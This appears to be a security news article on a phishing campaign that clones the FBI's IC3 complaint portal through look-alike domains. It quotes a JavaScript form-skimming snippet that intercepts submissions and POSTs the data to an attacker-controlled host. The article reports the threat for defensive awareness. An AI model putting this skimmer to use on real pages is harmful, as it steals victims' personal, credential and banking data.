A sophisticated spoofing campaign has emerged targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3).
Beginning in mid-September 2025, victims attempting to access IC3’s official portal were redirected to fraudulent domains crafted to mirror the legitimate site.
The impersonators employed look-alike URLs—such as “ic3-gov.com” and “ic3gov.org”—and reproduced authentic branding, including the FBI seal and IC3 banner.
Visitors who entered personal data found their information harvested for identity theft and financial fraud.
IC3 analysts identified the first wave of these fraudulent sites on September 18, 2025, when multiple reports surfaced of visitors receiving deceptive emails purportedly confirming IC3 report submissions.
Those messages contained links that led to cloned pages demanding extensive personally identifiable information (PII).
Although the initial entry point resembled a routine confirmation notice, the campaign’s underlying payload quietly exfiltrated all form data to attacker-controlled servers.
Following these early alerts, IC3 researchers noted that the spoofed infrastructure was hosted via bulletproof providers, enabling rapid domain rotation and minimal takedown capability.
Victims who attempted to “report” crimes or update existing reports unwittingly provided names, home addresses, phone numbers, email credentials, Social Security numbers, and banking information—all transmitted in clear text over HTTP.
In some cases, the cloned pages concealed additional JavaScript modules designed to capture keystrokes and cookies, further compromising visitor security.
Infection Mechanism and Data Harvesting
The malicious sites operate purely through phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the legitimate form’s submit event, rerouting user inputs to an exfiltration endpoint before allowing the browser to proceed or display a generic error.
A representative snippet illustrates this tactic:-
document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
evt.preventDefault();
var formData = new FormData(this);
fetch('https://malicious-ic3[.]net/collect', {
method: 'POST',
body: formData
}).then(() => this.submit());
});This approach enables seamless data capture without alerting the victim. The script also logs keystrokes via an injected listener on all input fields, collecting credentials and session cookies.
Because the code is embedded directly in the page’s HTML, traditional antivirus solutions relying on signature-based detection struggle to flag the threat.
Subsequent network analysis revealed repeated POST requests to the malicious domain shortly after each form submission, confirming successful data exfiltration.
Professionals are urged to verify the URL, ensure HTTPS with a valid .gov certificate, and report any suspicious IC3-branded pages to the FBI immediately.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
Source link
